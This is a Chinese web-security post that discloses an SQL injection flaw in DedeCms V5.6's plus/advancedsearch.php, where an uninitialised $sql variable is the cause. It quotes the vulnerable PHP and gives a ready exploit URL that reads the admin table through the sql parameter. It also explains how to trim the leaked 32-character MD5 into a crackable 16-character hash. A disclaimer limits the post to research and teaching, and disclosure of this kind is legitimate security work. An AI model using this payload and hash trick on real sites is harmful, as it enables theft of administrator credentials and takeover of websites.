服务器 > 网络安全 > 脚本攻防

DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞

72人参与 2011-08-19 脚本攻防

漏洞描述:
健壮的模板标签为站长diy 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 html的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,dedecms推出一些互动的模块对系统进行补充,尽量满足用户的需求。

plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞

复制代码
代码如下:

if($mid == 0) //必须绕过。
{
showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'";
$searchinfo = $dsql->getone($query);
if(!is_array($searchinfo)) //囧啊,绕过有难度。
{
showmsg('自定义搜索模型不存在','-1'); exit();
}
$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql)) //人品问题,成功绕过!{
..............
}else{
$sql = urldecode($sql);
$query = $sql;
}
$sql = urlencode($sql);
$dlist = new datalistcp();
$dlist->pagesize = 20;
$dlist->setparameter("sql", $sql);
$dlist->setparameter("mid", $mid);
...............
$dlist->settemplate($templatefile);
$dlist->setsource($query);
.............<*参考
*>

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
plus/advancedsearch.php?mid=1&sql=select%20*%20from%20`%23@__admin`

密码是32位md5减去头5位,减去尾七位,得到20 md5密码,方法是,前减3后减1,得到16位md5
(0)

您想发表意见!!点此发布评论

推荐阅读

dedecms v5.6 GBK 注入漏洞利用(member/index.php)

08-19

讯时漏洞一小结

07-15

DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6

08-19

讯时系统(xuas)最新通杀漏洞0day图文说明

07-15

DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)

08-19

php版shell.users加管理员帐号的方法

06-15

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论